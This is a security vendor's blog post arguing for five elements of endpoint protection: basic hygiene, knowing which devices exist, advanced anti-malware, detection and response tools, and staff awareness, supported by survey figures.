Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

How to Better Secure the Endpoint: 5 Elements of a Successful Strategy

Endpoints are everywhere and, at the same time, nowhere. Whether it is a laptop or desktop workstation, a smartphone or point-of-sale terminal, a printer or a medical instrument, or even a server in a data center - these network-connected devices are far and away the most preferred entry point for attackers. And "far and away" might be an apt way to describe endpoints in general, considering how prolific and decentralized they have become given the unrestrained rise of corporate BYOD mobility, remote access, Internet of Things and cloud applications.

Hackers like to start small and go after soft targets, which brings the added benefit of not raising suspicion or exerting too many resources. Endpoints fit that bill well. They are considered the most vulnerable part of the network and are often operated by users who are more than willing to lend a helping hand to attackers.

So it may come as no surprise that infections originating on the endpoint are to blame for many of the largest breaches we've seen over the past several years.  But at a time when new malware strains, such as Trojans and ransomware, are being created at record rates and becoming more targeted and sophisticated in nature - it appears companies are not doing enough to transition their focus to the endpoint, both of the traditional and non-traditional variety.

The statistics back this up: According to the SANS Institute, 44 percent of respondents to its third-annual survey on endpoint security reported that one or more of their endpoints have been compromised in the past two years and just 36 percent are detecting endpoint compromises through automated alerts. Many of an organization's endpoints are either unknown or being under-protected (or protected by only traditional, signature-based security controls), and if an incident does occur, the typical patchwork of endpoint devices at companies is such that they find difficulty in isolating where an incident even began, never mind responding and investigating in any meaningful way.

Meanwhile, businesses in many cases simply lack the resources to reduce endpoint security risk, according to the Ponemon Institute and CounterTack's 2016 State of Endpoint Report (registration required). The study found that just 36 percent of respondents are equipped with the adequate budget and staff to do this, and given the relentless demand by employees for mobile device support and access, 71 percent of respondents lament their ability to enforce endpoint security policies.

All is not lost. Thanks to a new wave of technologies, confidence in endpoint security is stronger than it has been in years. But you can't forget about the basics, either. Here are five elements of a successful strategy.

1) Do the Fundamentals Well

We'll discuss technology in just a second, but first you need to make sure you are incorporating general security best practices. That means applying tried-and-true principles, like forcing users to employ complex passwords (preferably passphrases), removing administrator rights from users, patching vulnerabilities and enforcing security configuration policies.

2) Know Your Endpoints

You can't protect what you don't know about. That is why you must not only thoroughly catalog your endpoints - and ensure that only approved devices are able to connect to your network - but also assess their vulnerability and patching status. You can prioritize the endpoints that are most at risk and contain the most sensitive data, but keep in mind that any endpoint that is internet-connected and can send files demands protection.

3) Deploy Advanced and Automated Endpoint Protection

While traditional anti-virus remains important and viable, it cannot alone be counted on to defend endpoints. You must go beyond a signature-based point product and turn to an integrated endpoint security solution that covers the full threat spectrum by offering capabilities like real-time malware protection, application whitelisting, Windows log collection and analysis and support for mobile.

4) Prioritize and Automate Detection and Response

As more organizations recognize the inevitability of a compromise, a solution category known as endpoint detection and response (EDR) has given endpoint security a rebirth of sorts, with Gartner last week declaring it a Top 10 information security technology for 2016. EDR can help identify behaviors and footprints commonly associated with compromises and provide useful endpoint data for effective threat monitoring, analysis and hunting. It also provides comprehensive endpoint-specific visibility to help you connect the dots if an attack is underway. Most of the current crop of EDR solutions require a fair amount of technical savvy and security knowledge to operate successfully, so look to the growing number of managed EDR solutions coming to market as a strong option for deployment.

5) Make Employees Your Ally

Of course, all of the endpoint security in the world can be rendered useless if an employee clicks on a phishing email and invites in a specialized piece of malware built to defeat most endpoint security. The aforementioned Ponemon study found that 81 percent of respondents cite "negligent or careless employees" who fail to adhere to security policies as the largest challenge in minimizing endpoint risk. At a minimum, you need to implement a creative security awareness program  that teaches workers to recognize risky emails and avoid downloading untrusted links or attachments. But even more than that, you need to create a culture of security throughout your organization that is built, inspired and endorsed from the top down.

Dan Kaplan is manager of online content at Trustwave and a former IT security reporter and editor.

Endpoint Protection

Latest Trustwave Blogs

Defending Healthcare Databases: Strategies to Safeguard Critical Information

The healthcare sector continues to be a primary target for threat actors, with 2023 seeing a record number of data breaches and compromised records. While successful attacks are inevitable, it’s...

Read More

Trustwave SpiderLabs: Ransomware Gangs Dominate 2024 Education Threat Landscape

The security teams manning the defenses at the higher education and primary school system levels often find themselves being tested by threat actors taking advantage of the sector's inherent cyber...

Read More

LockBit Takedown: Law Enforcement Disrupts Operations, but Ransomware Threats Likely to Persist

The news that US, UK, and other international law enforcement agencies disrupted LockBit is welcome, as stopping any threat group activity is always a positive. The unfortunate aspect is this blow...

Read More